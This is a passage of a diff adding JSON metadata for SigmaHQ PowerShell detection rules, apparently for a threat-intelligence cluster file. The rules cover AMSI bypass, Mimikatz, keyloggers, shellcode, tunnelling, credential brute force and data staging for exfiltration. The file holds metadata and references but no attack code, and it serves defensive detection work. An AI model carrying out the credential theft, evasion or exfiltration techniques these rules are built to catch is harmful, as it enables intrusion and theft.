"402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "value": "Malicious ShellIntel PowerShell Commandlets" + }, + { + "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_wmi_unquoted_service_search.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", + "value": "WMIC Unquoted Services Path Lookup - PowerShell" + }, + { + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ] + }, + "uuid": "e0d6c087-2d1c-47fd-8799-3904103c5a98", + "value": "AMSI Bypass Pattern Assembly GetType" + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_run_from_mount_diskimage.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", + "value": "Suspicious Invoke-Item From Mount-DiskImage" + }, + { + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_mail_acces.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114.001" + ] + }, + "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "value": "Powershell Local Email Collection" + }, + { + "description": "Detects the use of PowerShell to identify the current logged user.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_current_user.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", + "value": "Suspicious PowerShell Get Current User" + }, + { + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/17", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "posh_ps_user_discovery_get_aduser.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_invocation_lolscript_count.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536", + "value": "Execution via CL_Invocation.ps1 (2 Lines)" + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Highly likely if archive operations are done via PowerShell." + ], + "filename": "posh_ps_data_compressed.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_data_compressed.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1560" + ] + }, + "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "value": "Data Compressed - PowerShell" + }, + { + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_winlogon_helper_dll.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "value": "Winlogon Helper DLL" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/24", + "falsepositive": [ + "Rare intended use of hidden services", + "Rare FP could occure due to the non linearity of the ScriptBlockText log" + ], + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "22d80745-6f2c-46da-826b-77adaededd74", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS" + }, + { + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Mimikatz can be useful for testing the security of networks" + ], + "filename": "posh_ps_potential_invoke_mimikatz.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", + "value": "Potential Invoke-Mimikatz PowerShell Script" + }, + { + "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/21", + "falsepositive": [ + "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" + ], + "filename": "posh_ps_susp_follina_execution.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1537919885031772161", + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", + "value": "Troubleshooting Pack Cmdlet Execution" + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/995111125447577600", + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "value": "Execution via CL_Mutexverifiers.ps1" + }, + { + "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_get_adcomputer.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "value": "Active Directory Computers Enumeration with Get-AdComputer" + }, + { + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "posh_ps_software_discovery.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ] + }, + "uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", + "value": "Detected Windows Software Discovery - PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "value": "Invoke-Obfuscation Via Use Clip - Powershell" + }, + { + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_networkcredential.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.001" + ] + }, + "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", + "value": "Suspicious Connection to Remote Account" + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_mount_diskimage.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", + "value": "Suspicious Mount-DiskImage" + }, + { + "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", + "meta": { + "author": "Florian Roth, Perez Diego (@darkquassar)", + "creation_date": "2019/02/11", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_keywords.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", + "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", + "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "value": "Suspicious PowerShell Keywords" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "meta": { + "author": "frack113", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_recon_export.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ] + }, + "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", + "value": "Recon Information for Export with PowerShell" + }, + { + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_security_software_discovery.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", + "value": "Security Software Discovery by Powershell" + }, + { + "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ] + }, + "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", + "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy" + }, + { + "description": "Powershell use PassThru option to start in background", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_start_process.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "0718cd72-f316-4aa2-988f-838ea8533277", + "value": "Suspicious Start-Process PassThru" + }, + { + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_remove_adgroupmember.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", + "value": "Remove Account From Domain Admin Group" + }, + { + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/08", + "falsepositive": [ + "Administrators or Power users may remove their shares via cmd line" + ], + "filename": "posh_ps_susp_mounted_share_deletion.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ] + }, + "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", + "value": "PowerShell Deleted Mounted Share" + }, + { + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_proxy_scripts.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", + "value": "Suspicious TCP Tunnel Via PowerShell Script" + }, + { + "description": "Detects Base64 encoded Shellcode", + "meta": { + "author": "David Ledbetter (shellcode), Florian Roth (rule)", + "creation_date": "2018/11/17", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_shellcode_b64.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1063072865992523776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "value": "PowerShell ShellCode" + }, + { + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "filename": "posh_ps_susp_export_pfxcertificate.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "value": "Suspicious Export-PfxCertificate" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_local_group_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "value": "Suspicious Get Local Groups Information - PowerShell" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script" + }, + { + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_enable_windowsoptionalfeature.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "55c925c1-7195-426b-a136-a9396800e29b", + "value": "Potential Suspicious Windows Feature Enabled" + }, + { + "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_keylogger_activity.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", + "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", + "https://twitter.com/ScumBots/status/1610626724257046529", + "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" + ], + "tags": [ + "attack.collection", + "attack.credential_access", + "attack.t1056.001" + ] + }, + "uuid": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "value": "Potential Keylogger Activity" + }, + { + "description": "Get the processes that are running on the local computer.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_process.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "af4c87ce-bdda-4215-b998-15220772e993", + "value": "Suspicious Process Discovery With Get-Process" + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "meta": { + "author": 